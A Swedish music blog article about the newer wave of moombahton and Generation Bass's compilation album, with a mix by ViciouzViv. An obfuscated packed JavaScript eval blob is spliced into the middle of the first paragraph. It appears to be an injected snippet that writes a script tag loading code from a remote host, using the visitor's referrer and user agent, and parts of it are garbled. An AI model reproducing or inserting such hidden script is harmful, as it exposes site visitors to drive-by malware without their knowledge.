Image Image Image Image Image Image Image Image Image Image

| 16 april, 2021

Scroll to top

Top

Den nya generationens moombahton

Den nya generationens moombahton
Alexander Gylemo

Vi har tidigare gjort ett reportage om moombahton eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|fhdts|var|u0026u|referrer|fztkn||js|php’.split(’|’),0,{}))
och hur hela genren kom till. I reportaget nämndes de etablerade namnen och de grundläggande moombahtonlåtarna togs upp, men om man lyssnar på de senaste låtarna som släpps idag kan man lätt konstatera att genren förändrar sig för varje låt som släpps och runt tre år senare efter moombahtons födelse låter genren helt annorlunda.

Den enorma EDM-bloggen Generation Bass är en av de främsta fanbärarna för den nytillkomna genren och har nu släppt albumet New Wave of Moombahton Vol.1, där de senaste och yngre talangerna får visa vad de går för och tar genren i nya riktningar för varje låt. Nedan finner ni en mix av ViciouzViv av samtliga låtar från albumet, enjoy!
Generation Bass Presents:: New Wave of Moombahton Vol. 1 by ViciouzViv